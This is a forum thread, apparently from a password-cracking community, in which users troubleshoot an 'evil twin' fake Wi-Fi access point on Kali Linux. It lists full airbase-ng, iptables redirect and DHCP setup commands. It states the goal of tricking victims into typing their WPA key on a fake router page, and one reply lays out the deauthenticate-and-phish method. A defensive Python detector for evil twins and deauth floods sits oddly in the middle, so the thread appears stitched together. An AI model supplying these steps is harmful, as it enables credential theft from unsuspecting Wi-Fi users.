DHCP for Fake AP Not Working


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 17:03:51

I have been some time trying to get DHCP working on Kali. I notice there has been some confusion with Kali as it now uses isc-dhcp-server and most tutorials / scripts are for Backtrack.

I have put together (from a collection of posts) the list of commands below.

I am able to get the fake AP running and I can connect to it, except I cannot receive an IP.

Can a Linux guru take a look at my commands and help me out please?

Thanks.


I am using Kali latest build and all updated. The laptop (client) is set to receive an IP from a DHCP server.


My commands...


###########################################
airmon-ng start wlan0
airbase-ng -c 1 -Z 4 -v -e AP mon0
ifconfig at0 up
ifconfig at0 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.102:80
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
echo "1" > /proc/sys/net/ipv4/ip_forward

###########################################
The /etc/dhcp/dhcp.conf looks like this....
###########################################

ddns-update-style interim;
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option domain-name-servers 8.8.8.8;
option routers 192.168.1.255;
range 192.168.1.100 192.168.1.254;
}
###########################################

.
edited by Hash-IT on 01/12/2013


eljolot

Status: Senior
Joined: Wed, 15 Aug 2012
Posts: 757
Team:
Reputation: 275 Reputation
Offline
Sun, 01 Dec 2013 @ 17:44:41

Try wifite.py, which is also in Kali. Well, this is for when you are very lazy. Just type wifite in the terminal and the script will do almost everything for you.


Kill hashes is a way of life
/dev/null/ before dishonor
/dev/null/ antes que el deshonor
CPU: AMD 8350FX
Rig 1: 1 x Radeon HD 7970 Non reference cooler

Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 18:02:24

eljolot said:

Try wifite.py, which is also in Kali. Well, this is for when you are very lazy. Just type wifite in the terminal and the script will do almost everything for you.

Thanks for the suggestion

I would like to be able to do this manually though, I just can't see where I am going wrong.


hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Sun, 01 Dec 2013 @ 18:06:54

Hash-IT said:

I am able to get the fake AP running and I can connect to it, except I cannot receive an IP.


Just to be sure... You're not doing the encrypted fake AP thing we've discussed earlier, are you?

If you want to set up a fake AP and make the client surf the Internet then you must set up an open access point and hope the client for any reason will connect to you. I mean, in order to exchange packets with the client you need to know the passphrase since all the data is encrypted. The 'technique' I wrote about is useful only to obtain the handshake.


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 18:34:55

hash-ire said:


Just to be sure... You're not doing the encrypted fake AP thing we've discussed earlier, are you?

When I read the line above I just knew I had made a monumental mistake

hash-ire said:

If you want to set up a fake AP and make the client surf the Internet then you must set up an open access point and hope the client for any reason will connect to you. I mean, in order to exchange packets with the client you need to know the passphrase since all the data is encrypted. The 'technique' I wrote about is useful only to obtain the handshake.

I think this must be it, I wrongfully assumed two things.

The first that the IP etc was supplied BEFORE the encryption started.

The second was that I could not imagine the fake AP attack to work if the user was presented with an open unencrypted connection warning when they are used to being on a WPA network. I assumed there must have been some clever goings on in the background to present the fake AP as an encrypted one.

I think I need to test it with this line changed...

airbase-ng -c 1 -Z 4 -v -e AP mon0

To this...

airbase-ng -c 1 -v -e AP mon0

Thank you once again hash-ire, I am embarrassed by my n00bness and also a bit annoyed that I didn't ask this question this morning instead of wasting all day trying to get this to work

I will test and report back soon

Thanks.

Edit to say...

Forgot to mention, this is not to catch the WPA key, I am trying to make a fake router page pop up and get the user to enter the WPA PSK. The other WPA from client thing works great, thanks

.
edited by Hash-IT on 01/12/2013


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 19:00:57

Well hash-ire it certainly looks more promising

I get several repeat messages in the DHCP command window now when I try to connect the laptop.

DHCPACK on 192.168.1.100 to 00:11:22:33:44:55 (LapTop) via at0
DHCPREQUEST for 192.168.1.100 (192.168.1.1) from 00:11:22:33:44:55 (LapTop) via at0

etc

So things do look better

I leave it to connect but it goes no further. All the laptop (client) tells me is that it is waiting for an IP address. I leave it for over 60 seconds and then I get the usual windows limited or no connectivity warning.

Nearly there LOL. Any ideas?


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Mon, 02 Dec 2013 @ 16:31:43

Well, after 3 days of stress I think I have found the problem.

It is hardware.

Looks like I have been setting it all up OK software wise but when I tested I used the laptop internal wifi card.

For some reason using that internal card it doesn't work. However that card connects perfectly well to my actual hardware AP. Not sure why it is different.

Anyway I used my other external dongle on the laptop and it all worked ok first time.

Problem is now I am not sure what I had done software wise after much messing about. LOL

Not sure if I should leave this thread up, what do you think ? I don't want to confuse others at a later date.



hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Fri, 06 Dec 2013 @ 20:53:36

I'm glad you solved it.

Just a quick note. What you are trying to do has its own name. It's called evil twin.

Basically you set up a fake open access point with the same ESSID as the targeted network. Then you keep disconnecting the client of that network. Hopefully the user will open up the wifi manager and connect to your evil AP. At this point when the user opens up his browser you'll redirect him to a fake AP configuration page where the user will be asked to enter his password. Then when you have the key, obviously you just stop everything you've set up and you're done.
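
A defender-side view of the evil twin described above, as an added example that is not part of the original posts: it flags a managed SSID that is advertised open or from an unknown BSSID, and clients hit by bursts of deauthentication frames. The inventory, the sample observations and the function names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample: beacon observations (ssid, bssid, security, channel)
# as a WLAN sensor or site survey might record them.
BEACONS = [
    ("HomeNet", "aa:bb:cc:00:00:01", "WPA2-PSK", 6),
    ("HomeNet", "02:11:22:33:44:55", "OPEN", 1),   # same ESSID, no encryption
    ("CoffeeShop", "de:ad:be:ef:00:01", "OPEN", 11),
    ("Office", "aa:bb:cc:00:00:10", "WPA2-PSK", 36),
    ("Office", "aa:bb:cc:00:00:11", "WPA2-PSK", 40),
]
# Hypothetical inventory of the networks we operate.
KNOWN = {
    "HomeNet": {"security": "WPA2-PSK", "bssids": {"aa:bb:cc:00:00:01"}},
    "Office": {"security": "WPA2-PSK",
               "bssids": {"aa:bb:cc:00:00:10", "aa:bb:cc:00:00:11"}},
}
# Constructed sample: (timestamp in seconds, client MAC) per deauth frame seen.
DEAUTHS = [(t, "66:77:88:99:aa:bb") for t in (0.0, 0.8, 1.5, 2.1, 3.0, 3.6)]
DEAUTHS += [(3.0, "66:77:88:99:aa:cc"), (90.0, "66:77:88:99:aa:cc")]

def find_evil_twin_candidates(beacons, known):
    """Return sorted (ssid, bssid, reason) alerts for SSIDs in the inventory."""
    alerts = set()
    for ssid, bssid, security, _channel in beacons:
        profile = known.get(ssid)
        if profile is None:
            continue  # not our network, nothing to compare against
        bssid = bssid.lower()
        if security != profile["security"]:
            reason = f"security downgrade: {security} instead of {profile['security']}"
            alerts.add((ssid, bssid, reason))
        elif bssid not in profile["bssids"]:
            alerts.add((ssid, bssid, "unknown BSSID"))
    return sorted(alerts)

def deauth_bursts(events, threshold=5, window=10.0):
    """Return clients that received >= threshold deauths within `window` seconds."""
    by_client = defaultdict(list)
    for ts, client in events:
        by_client[client].append(ts)
    flagged = []
    for client, stamps in by_client.items():
        stamps.sort()
        # Slide over each run of `threshold` consecutive frames.
        for i in range(len(stamps) - threshold + 1):
            if stamps[i + threshold - 1] - stamps[i] <= window:
                flagged.append(client)
                break
    return sorted(flagged)
```

An open beacon for an SSID that should be WPA2 is the stronger signal; a deauth burst against a client on the same SSID at the same time corroborates it.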


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sat, 07 Dec 2013 @ 18:22:14

Thanks hash-ire.

I have the network part all working, very strange about the problem with one piece of hardware. That same wifi hardware works on others !

Well I say all working but the DNSspoof doesn't forward any page with a sub page, like mysite.com/anotherpage. It works on mysite.com though. Very odd bug.

Sorry for my late reply but I haven't been able to log in LOL


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Wed, 11 Dec 2013 @ 12:12:37

Oh no

I may have spoken too soon.

This in fact might not be a hardware issue.

I was trying to demonstrate this fake AP and I could not get it to work on anything other than my own laptop and PC. This laptop has an Alpha wifi card.

My main base unit (PC) has another alpha card, so the 2 computers with alpha cards can perform the full attack, everything worked great.

So it seems as if any other card or internal wifi (victim side) does not allow connecting to my fake AP. Very strange.

Anyone have any suggestions ?


Edit:

Looks like this might be a known bug.


https://forums.kali.org/showthread.php?4643-Create-Hotsopt-on-Kali-linux


8E3B635F

Status: Trusted
Joined: Wed, 19 Feb 2014
Posts: 640
Team:
Reputation: 645 Reputation
Offline
Sun, 23 Feb 2014 @ 11:33:35

Hash-IT said:

Oh no

I may have spoken too soon.

This in fact might not be a hardware issue.

I was trying to demonstrate this fake AP and I could not get it to work on anything other than my own laptop and PC. This laptop has an Alpha wifi card.

My main base unit (PC) has another alpha card, so the 2 computers with alpha cards can perform the full attack, everything worked great.

So it seems as if any other card or internal wifi (victim side) does not allow connecting to my fake AP. Very strange.

Anyone have any suggestions ?


Edit:

Looks like this might be a known bug.


https://forums.kali.org/showthread.php?4643-Create-Hotsopt-on-Kali-linux

Don't know if you are still having problems with this but I found a website that shows you how to use easycreds and pwnstar and also how to set up the DHCP on Kali - 4th paragraph

http://secjohn.blogspot.co.uk/2013/08/fake-ap-on-kali-linu.html

I have followed this before and it worked

Rab.


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 23 Feb 2014 @ 11:39:43

user said:

Don't know if you are still having problems with this but I found a website that shows you how to use easycreds and pwnstar and also how to set up the DHCP on Kali - 4th paragraph

http://secjohn.blogspot.co.uk/2013/08/fake-ap-on-kali-linu.html

I have followed this before and it worked

Rab.

Hi

Thanks for your link

I am still interested in this subject but I am busy with 3 other projects just now. I would however like to sort this issue out at some point.

As far as I can tell my problem is that I use Alpha Network wifi adaptors. For some reason they only talk to other Alpha Network adaptors and nothing else when using them in the fake AP attack.

All I have been able to find out so far is that it "may" be a driver problem.

Can I ask if you used Alpha Network adaptors when it worked for you ?

Thanks.


nifty nerd

Status: n/a
Joined: Sun, 21 Sep 2014
Posts: 1
Team:
Reputation: 0 Reputation
Offline
Sun, 21 Sep 2014 @ 09:11:01

Hi
can you help me with this.

So far I can create the access point, but when the client tries to connect to it I get "No internet Access" - Windows 7.
And then when I troubleshoot it says DNS error or DNS not responding.
My setting seems correct.
Tried using two wifi adapters and same error. Now with wired and wireless, same error.
Any help would be appreciated.
If you guys need anything else do let me know


